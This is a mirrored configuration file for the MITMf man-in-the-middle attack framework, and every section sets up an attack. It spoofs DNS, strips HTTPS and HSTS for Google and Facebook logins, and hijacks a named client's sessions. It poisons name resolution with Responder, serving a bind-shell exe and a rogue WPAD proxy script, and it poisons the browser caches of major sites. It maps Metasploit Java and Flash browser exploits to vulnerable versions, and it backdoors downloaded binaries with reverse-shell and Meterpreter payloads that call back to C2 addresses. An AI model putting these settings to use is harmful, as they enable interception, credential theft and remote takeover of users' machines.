mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2024-10-17 20:50:35 -07:00
529 lines
19 KiB
Plaintext
Executable File
529 lines
19 KiB
Plaintext
Executable File
#
|
|
# MITMf configuration file
|
|
#
|
|
|
|
[MITMf]
|
|
|
|
# Required BeEF and Metasploit options
|
|
[[BeEF]]
|
|
host = 127.0.0.1
|
|
port = 3000
|
|
user = beef
|
|
pass = beef
|
|
|
|
[[Metasploit]]
|
|
rpcip = 127.0.0.1
|
|
rpcport = 55552
|
|
rpcpass = abc123
|
|
|
|
[[MITMf-API]]
|
|
host = 127.0.0.1
|
|
port = 9999
|
|
|
|
[[DNS]]
|
|
|
|
#
|
|
# Here you can configure MITMf's internal DNS server
|
|
#
|
|
|
|
tcp = Off # Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff!)
|
|
port = 53 # Port to listen on
|
|
ipv6 = Off # Run in IPv6 mode (not fully tested, might break stuff!)
|
|
|
|
#
|
|
# Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
|
|
# can also be a comma seperated list e.g 8.8.8.8,8.8.4.4
|
|
#
|
|
nameservers = 8.8.8.8
|
|
|
|
[[[A]]] # Queries for IPv4 address records
|
|
*.thesprawl.org=192.168.178.27
|
|
*.captive.portal=192.168.1.100
|
|
|
|
[[[AAAA]]] # Queries for IPv6 address records
|
|
*.thesprawl.org=2001:db8::1
|
|
|
|
[[[MX]]] # Queries for mail server records
|
|
*.thesprawl.org=mail.fake.com
|
|
|
|
[[[NS]]] # Queries for mail server records
|
|
*.thesprawl.org=ns.fake.com
|
|
|
|
[[[CNAME]]] # Queries for alias records
|
|
*.thesprawl.org=www.fake.com
|
|
|
|
[[[TXT]]] # Queries for text records
|
|
*.thesprawl.org=fake message
|
|
|
|
[[[PTR]]] # PTR queries
|
|
*.2.0.192.in-addr.arpa=fake.com
|
|
|
|
[[[SOA]]] #FORMAT: mname rname t1 t2 t3 t4 t5
|
|
*.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600
|
|
|
|
[[[NAPTR]]] #FORMAT: order preference flags service regexp replacement
|
|
*.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! .
|
|
|
|
[[[SRV]]] #FORMAT: priority weight port target
|
|
*.*.thesprawl.org=0 5 5060 sipserver.fake.com
|
|
|
|
[[[DNSKEY]]] #FORMAT: flags protocol algorithm base64(key)
|
|
*.thesprawl.org=256 3 5 AQPSKmynfzW4kyBv015MUG2DeIQ3Cbl+BBZH4b/0PY1kxkmvHjcZc8nokfzj31GajIQKY+5CptLr3buXA10hWqTkF7H6RfoRqXQeogmMHfpftf6zMv1LyBUgia7za6ZEzOJBOztyvhjL742iU/TpPSEDhm2SNKLijfUppn1UaNvv4w==
|
|
|
|
[[[RRSIG]]] #FORMAT: covered algorithm labels labels orig_ttl sig_exp sig_inc key_tag name base64(sig)
|
|
*.thesprawl.org=A 5 3 86400 20030322173103 20030220173103 2642 thesprawl.org. oJB1W6WNGv+ldvQ3WDG0MQkg5IEhjRip8WTrPYGv07h108dUKGMeDPKijVCHX3DDKdfb+v6oB9wfuh3DTJXUAfI/M0zmO/zz8bW0Rznl8O3tGNazPwQKkRN20XPXV6nwwfoXmJQbsLNrLfkGJ5D6fwFm8nN+6pBzeDQfsS3Ap3o=
|
|
|
|
#
|
|
# Plugin configuration starts here
|
|
#
|
|
[Captive]
|
|
|
|
# Set Server Port and string if we are serving our own portal from SimpleHTTPServer (80 is already used by default server)
|
|
Port = 8080
|
|
ServerString = "Captive Server 1.0"
|
|
|
|
# Set the filename served as /CaptivePortal.exe by integrated http server
|
|
PayloadFilename = config/captive/calc.exe
|
|
|
|
[Replace]
|
|
|
|
[[Regex1]]
|
|
'Google Search' = '44CON'
|
|
|
|
[[Regex2]]
|
|
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
|
|
|
|
[Ferret-NG]
|
|
#
|
|
# Here you can specify the client to hijack sessions from
|
|
#
|
|
|
|
Client = '10.0.237.91'
|
|
|
|
[SSLstrip+]
|
|
|
|
#
|
|
#Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com
|
|
#
|
|
|
|
#for google and gmail
|
|
accounts.google.com = account.google.com
|
|
mail.google.com = gmail.google.com
|
|
accounts.google.se = cuentas.google.se
|
|
|
|
#for facebook
|
|
www.facebook.com = social.facebook.com
|
|
|
|
[Responder]
|
|
|
|
#Servers to start
|
|
SQL = On
|
|
HTTPS = On
|
|
Kerberos = On
|
|
FTP = On
|
|
POP = On
|
|
SMTP = On
|
|
IMAP = On
|
|
LDAP = On
|
|
|
|
#Custom challenge
|
|
Challenge = 1122334455667788
|
|
|
|
#Specific IP Addresses to respond to (default = All)
|
|
#Example: RespondTo = 10.20.1.100-150, 10.20.3.10
|
|
RespondTo =
|
|
|
|
#Specific NBT-NS/LLMNR names to respond to (default = All)
|
|
#Example: RespondTo = WPAD, DEV, PROD, SQLINT
|
|
RespondToName =
|
|
|
|
#Specific IP Addresses not to respond to (default = None)
|
|
#Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
|
|
DontRespondTo =
|
|
|
|
#Specific NBT-NS/LLMNR names not to respond to (default = None)
|
|
#Example: DontRespondTo = NAC, IPS, IDS
|
|
DontRespondToName =
|
|
|
|
[[HTTP Server]]
|
|
|
|
#Set to On to always serve the custom EXE
|
|
Serve-Always = Off
|
|
|
|
#Set to On to replace any requested .exe with the custom EXE
|
|
Serve-Exe = On
|
|
|
|
#Set to On to serve the custom HTML if the URL does not contain .exe
|
|
Serve-Html = Off
|
|
|
|
#Custom HTML to serve
|
|
HtmlFilename = config/responder/AccessDenied.html
|
|
|
|
#Custom EXE File to serve
|
|
ExeFilename = config/responder/BindShell.exe
|
|
|
|
#Name of the downloaded .exe that the client will see
|
|
ExeDownloadName = ProxyClient.exe
|
|
|
|
#Custom WPAD Script
|
|
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}'
|
|
|
|
#HTML answer to inject in HTTP responses (before </body> tag).
|
|
#Set to an empty string to disable.
|
|
#In this example, we redirect make users' browsers issue a request to our rogue SMB server.
|
|
HTMLToInject = <img src='file://RespProxySrv/pictures/logo.jpg' alt='Loading' height='1' width='1'>
|
|
|
|
[[HTTPS Server]]
|
|
|
|
#Configure SSL Certificates to use
|
|
SSLCert = config/responder/responder.crt
|
|
SSLKey = config/responder/responder.key
|
|
|
|
[AppCachePoison]
|
|
# HTML5 AppCache poisioning attack
|
|
# see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
|
|
# generic settings for tampering engine
|
|
|
|
#enable_only_in_useragents=Chrome|Firefox
|
|
|
|
templates_path=config/app_cache_poison_templates
|
|
|
|
# when visiting first url matching following expression we will embed iframes with all tamper URLs
|
|
#(to poison the cache for all of them all at once)
|
|
|
|
mass_poison_url_match=http://.*prezydent\.pl.*
|
|
|
|
# it's only useful to mass poison chrome because:
|
|
# - it supports iframe sandbox preventing framebusting
|
|
# - does not ask for confirmation
|
|
|
|
mass_poison_useragent_match=Chrome|Safari
|
|
|
|
[[test]]
|
|
# any //example.com URL redirects to iana and will display our spoofed content
|
|
|
|
tamper_url=http://example.com/
|
|
manifest_url=http://www.iana.org/robots.txt #use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
|
|
templates=test # which templates to use for spoofing content?
|
|
skip_in_mass_poison=1
|
|
|
|
[[google]]
|
|
tamper_url_match = http://www.google.com\.*.
|
|
tamper_url = http://www.google.com
|
|
manifest_url = http://www.google.com/robots.txt
|
|
|
|
[[facebook]]
|
|
tamper_url=http://www.facebook.com/?_rdr
|
|
manifest_url=http://www.facebook.com/robots.txt
|
|
templates=facebook # use different template
|
|
|
|
[[twitter]]
|
|
tamper_url=http://twitter.com/
|
|
tamper_url_match=^http://(www\.)?twitter\.com/$
|
|
manifest_url=http://twitter.com/robots.txt
|
|
|
|
[[html5rocks]]
|
|
tamper_url=http://www.html5rocks.com/en/
|
|
manifest_url=http://www.html5rocks.com/robots.txt
|
|
|
|
[[ga]]
|
|
# we can also modify non-HTML URLs to append malicious code to them
|
|
# but for them to be cached in HTML5 AppCache they need to be referred in
|
|
# manifest for a poisoned domain
|
|
# if not, they are "only" cached for 10 years :D
|
|
|
|
raw_url=http://www.google-analytics.com/ga.js
|
|
templates=script
|
|
skip_in_mass_poison=1
|
|
#you can add other scripts in additional sections like jQuery etc.
|
|
|
|
[BrowserSniper]
|
|
#
|
|
# Currently only supports java, flash and browser exploits
|
|
#
|
|
# The version strings were pulled from http://www.cvedetails.com
|
|
#
|
|
# When adding java exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
|
|
#
|
|
|
|
msfport = 8080 # Port to start Metasploit's webserver which will host the exploits
|
|
|
|
[[exploits]]
|
|
|
|
[[[multi/browser/java_rhino]]] #Exploit's MSF path
|
|
|
|
Type = PluginVuln #Can be set to PluginVuln, BrowserVuln
|
|
OS = Any #Can be set to Any, Windows or Windows + version (e.g Windows 8.1)
|
|
|
|
Browser = Any #Can be set to Any, Chrome, Firefox, MSIE or browser + version (e.g IE 6)
|
|
Plugin = Java #Can be set to Java, Flash (if Type is BrowserVuln will be ignored)
|
|
|
|
#An exact list of the plugin versions affected (if Type is BrowserVuln will be ignored)
|
|
PluginVersions = 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.23, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.3, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0
|
|
|
|
[[[multi/browser/java_atomicreferencearray]]]
|
|
|
|
Type = PluginVuln
|
|
OS = Any
|
|
Browser = Any
|
|
Plugin = Java
|
|
PluginVersions = 1.5.0, 1.5.0.1, 1.5.0.10, 1.5.0.11, 1.5.0.12, 1.5.0.13, 1.5.0.14, 1.5.0.15, 1.5.0.16, 1.5.0.17, 1.5.0.18, 1.5.0.19, 1.5.0.2, 1.5.0.20, 1.5.0.21, 1.5.0.22, 1.5.0.23, 1.5.0.24, 1.5.0.25, 1.5.0.26, 1.5.0.27, 1.5.0.28, 1.5.0.29, 1.5.0.3, 1.5.0.31, 1.5.0.33, 1.5.0.4, 1.5.0.5, 1.5.0.6, 1.5.0.7, 1.5.0.8, 1.5.0.9, 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.29, 1.6.0.3, 1.6.0.30, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0, 1.7.0.1, 1.7.0.2
|
|
|
|
[[[multi/browser/java_jre17_jmxbean_2]]]
|
|
|
|
Type = PluginVuln
|
|
OS = Any
|
|
Browser = Any
|
|
Plugin = Java
|
|
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
|
|
|
|
[[[multi/browser/java_jre17_reflection_types]]]
|
|
|
|
Type = PluginVuln
|
|
OS = Any
|
|
Browser = Any
|
|
Plugin = Java
|
|
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
|
|
|
|
[[[multi/browser/java_verifier_field_access]]]
|
|
|
|
Type = PluginVuln
|
|
OS = Any
|
|
Browser = Any
|
|
Plugin = Java
|
|
PluginVersions = 1.4.2.37, 1.5.0.35, 1.6.0.32, 1.7.0.4
|
|
|
|
[[[multi/browser/java_jre17_provider_skeleton]]]
|
|
|
|
Type = PluginVuln
|
|
OS = Any
|
|
Browser = Any
|
|
Plugin = Java
|
|
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.21, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
|
|
|
|
[[[exploit/windows/browser/adobe_flash_pcre]]]
|
|
|
|
Type = PluginVuln
|
|
OS = Windows
|
|
Browser = Any
|
|
Plugin = Flash
|
|
PluginVersions = 11.2.202.440, 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296
|
|
|
|
[[[exploit/windows/browser/adobe_flash_net_connection_confusion]]]
|
|
|
|
Type = PluginVuln
|
|
OS = Windows
|
|
Browser = Any
|
|
Plugin = Flash
|
|
PluginVersions = 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 16.0.0.305
|
|
|
|
[[[exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array]]]
|
|
|
|
Type = PluginVuln
|
|
OS = Windows
|
|
Browser = Any
|
|
Plugin = Flash
|
|
PluginVersions = 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273,11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.400, 13.0.0.111, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.83, 14.0.0.110, 14.0.0.125, 14.0.0.137, 14.0.0.145, 14.0.0.176, 14.0.0.178, 14.0.0.179, 15.0.0.144
|
|
|
|
[[[exploit/multi/browser/adobe_flash_opaque_background_uaf]]]
|
|
|
|
Type = PluginVuln
|
|
OS = Any
|
|
Browser = Any
|
|
Plugin = Flash
|
|
PluginVersions = 11.1, 11.1.102.59, 11.1.102.62, 11.1.102.63, 11.1.111.44, 11.1.111.50, 11.1.111.54, 11.1.111.64, 11.1.111.73, 11.1.111.8, 11.1.115.34, 11.1.115.48, 11.1.115.54, 11.1.115.58, 11.1.115.59, 11.1.115.63, 11.1.115.69, 11.1.115.7, 11.1.115.81, 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273, 11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.327, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.411, 11.2.202.424, 11.2.202.425, 11.2.202.429, 11.2.202.438, 11.2.202.440, 11.2.202.442, 11.2.202.451, 11.2.202.468, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.244, 13.0.0.250, 13.0.0.257, 13.0.0.258, 13.0.0.259, 13.0.0.260, 13.0.0.262, 13.0.0.264, 13.0.0.289, 13.0.0.292, 13.0.0.302, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 17.0.0.134, 17.0.0.169, 17.0.0.188, 17.0.0.190, 18.0.0.160, 18.0.0.194, 18.0.0.203, 18.0.0.204
|
|
|
|
[[[exploit/multi/browser/adobe_flash_hacking_team_uaf]]]
|
|
|
|
Type = PluginVuln
|
|
OS = Any
|
|
Browser = Any
|
|
Plugin = Flash
|
|
PluginVersions = 13.0.0.292, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 17.0.0.134, 17.0.0.169, 17.0.0.188, 18.0.0.161, 18.0.0.194
|
|
|
|
[FilePwn]
|
|
|
|
#
|
|
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
|
#
|
|
# Copyright (c) 2013-2014, Joshua Pitts
|
|
# All rights reserved.
|
|
#
|
|
# Redistribution and use in source and binary forms, with or without modification,
|
|
# are permitted provided that the following conditions are met:
|
|
#
|
|
# 1. Redistributions of source code must retain the above copyright notice,
|
|
# this list of conditions and the following disclaimer.
|
|
#
|
|
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
|
# this list of conditions and the following disclaimer in the documentation
|
|
# and/or other materials provided with the distribution.
|
|
#
|
|
# 3. Neither the name of the copyright holder nor the names of its contributors
|
|
# may be used to endorse or promote products derived from this software without
|
|
# specific prior written permission.
|
|
#
|
|
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
|
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
|
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
|
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
|
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
|
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
|
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
|
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
|
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
# POSSIBILITY OF SUCH DAMAGE.
|
|
#
|
|
|
|
[[hosts]]
|
|
#whitelist host/IP - patch these only.
|
|
#ALL is everything, use the blacklist to leave certain hosts/IPs out
|
|
|
|
whitelist = ALL
|
|
|
|
#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.
|
|
|
|
blacklist = , # a comma is null do not leave blank
|
|
|
|
|
|
[[keywords]]
|
|
#These checks look at the path of a url for keywords
|
|
|
|
whitelist = ALL
|
|
|
|
#For blacklist note binaries that you do not want to touch at all
|
|
|
|
# Also applied in zip files
|
|
|
|
blacklist = .dll
|
|
|
|
|
|
[[ZIP]]
|
|
# patchCount is the max number of files to patch in a zip file
|
|
# After the max is reached it will bypass the rest of the files
|
|
# and send on it's way
|
|
|
|
patchCount = 5
|
|
|
|
# In Bytes
|
|
maxSize = 50000000
|
|
|
|
blacklist = .dll, #don't do dlls in a zip file
|
|
|
|
[[TAR]]
|
|
# patchCount is the max number of files to patch in a tar file
|
|
# After the max is reached it will bypass the rest of the files
|
|
# and send on it's way
|
|
|
|
patchCount = 5
|
|
|
|
# In Bytes
|
|
maxSize = 10000000
|
|
|
|
blacklist = , # a comma is null do not leave blank
|
|
|
|
[[targets]]
|
|
#MAKE SURE that your settings for host and port DO NOT
|
|
# overlap between different types of payloads
|
|
|
|
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
|
|
|
|
LinuxType = ALL # choices: x86/x64/ALL/None
|
|
WindowsType = ALL # choices: x86/x64/ALL/None
|
|
FatPriority = x64 # choices: x86 or x64
|
|
|
|
FileSizeMax = 10000000 # ~10 MB (just under) No patching of files this large
|
|
|
|
CompressedFiles = True #True/False
|
|
[[[[LinuxIntelx86]]]]
|
|
SHELL = reverse_shell_tcp # This is the BDF syntax
|
|
HOST = 192.168.1.168 # The C2
|
|
PORT = 8888
|
|
SUPPLIED_SHELLCODE = None
|
|
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
|
|
|
[[[[LinuxIntelx64]]]]
|
|
SHELL = reverse_shell_tcp
|
|
HOST = 192.168.1.16
|
|
PORT = 9999
|
|
SUPPLIED_SHELLCODE = None
|
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
|
|
[[[[WindowsIntelx86]]]]
|
|
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
|
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
|
|
PATCH_METHOD = automatic
|
|
HOST = 192.168.20.79
|
|
PORT = 8090
|
|
# SHELL for use with automatic PATCH_METHOD
|
|
SHELL = iat_reverse_tcp_stager_threaded
|
|
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
|
|
SUPPLIED_SHELLCODE = None
|
|
ZERO_CERT = True
|
|
# PATCH_DLLs as they come across
|
|
PATCH_DLL = False
|
|
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
|
|
RUNAS_ADMIN = False
|
|
# XP_MODE - to support XP targets
|
|
XP_MODE = True
|
|
# SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and
|
|
# with PATCH_METHOD 'replace' use an EXE not DLL
|
|
SUPPLIED_BINARY = veil_go_payload.exe
|
|
MSFPAYLOAD = windows/meterpreter/reverse_tcp
|
|
|
|
[[[[WindowsIntelx64]]]]
|
|
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
|
# PATCH_METHOD overwrites PATCH_TYPE, use automatic or onionduke
|
|
PATCH_METHOD = automatic
|
|
HOST = 192.168.1.16
|
|
PORT = 8088
|
|
# SHELL for use with automatic PATCH_METHOD
|
|
SHELL = iat_reverse_tcp_stager_threaded
|
|
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
|
|
SUPPLIED_SHELLCODE = None
|
|
ZERO_CERT = True
|
|
PATCH_DLL = True
|
|
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
|
|
RUNAS_ADMIN = False
|
|
# SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and
|
|
# with PATCH_METHOD 'replace' use an EXE not DLL
|
|
SUPPLIED_BINARY = pentest_x64_payload.exe
|
|
MSFPAYLOAD = windows/x64/shell/reverse_tcp
|
|
|
|
[[[[MachoIntelx86]]]]
|
|
SHELL = reverse_shell_tcp
|
|
HOST = 192.168.1.16
|
|
PORT = 4444
|
|
SUPPLIED_SHELLCODE = None
|
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
|
|
[[[[MachoIntelx64]]]]
|
|
SHELL = reverse_shell_tcp
|
|
HOST = 192.168.1.16
|
|
PORT = 5555
|
|
SUPPLIED_SHELLCODE = None
|
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
|
|
# Call out the difference for targets here as they differ from ALL
|
|
# These settings override the ALL settings
|
|
|
|
[[[sysinternals.com]]]
|
|
LinuxType = None
|
|
WindowsType = ALL
|
|
CompressedFiles = False
|
|
#inherits WindowsIntelx86 from ALL
|
|
[[[[WindowsIntelx86]]]]
|
|
PATCH_DLL = False
|
|
ZERO_CERT = True
|
|
|
|
[[[sourceforge.org]]]
|
|
WindowsType = x64
|
|
CompressedFiles = False
|
|
|
|
[[[[WindowsIntelx64]]]]
|
|
PATCH_DLL = False
|
|
|
|
[[[[WindowsIntelx86]]]]
|
|
PATCH_DLL = False
|